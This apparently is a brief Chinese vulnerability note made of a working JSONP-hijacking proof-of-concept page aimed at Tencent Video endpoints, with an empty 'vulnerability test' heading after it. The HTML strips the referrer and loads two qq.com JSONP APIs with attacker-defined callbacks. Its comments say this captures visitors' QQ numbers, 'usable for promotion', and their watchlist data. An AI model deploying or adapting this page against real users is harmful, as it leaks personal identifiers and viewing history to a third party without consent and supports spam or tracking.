0x01 测试html代码
<!DOCTYPE html><html lang='en'><head> <meta name="referrer" content="never" charset="utf-8"> <title>jsonp劫持</title></head><body> https://v.qq.com jsonp劫持</body> <!-- 劫持用户qq号 可用于推广 --> <script>function jc(data){alert(JSON.stringify(data));}</script> <script src="http://node.video.qq.com/x/api/get_2029?callback=jc&_=1542534620161"></script> <!-- 劫持用户看单数据 --> <script>function jc2(data){alert(JSON.stringify(data));}</script> <script src="http://like.video.qq.com/fcgi-bin/flw_new?otype=json&sn=FollowServer&cmd=2562&pidx=0&size=30&dtype=0&type=0&callback=jc2&_=1542536629083"></script></html>
0x02 漏洞测试


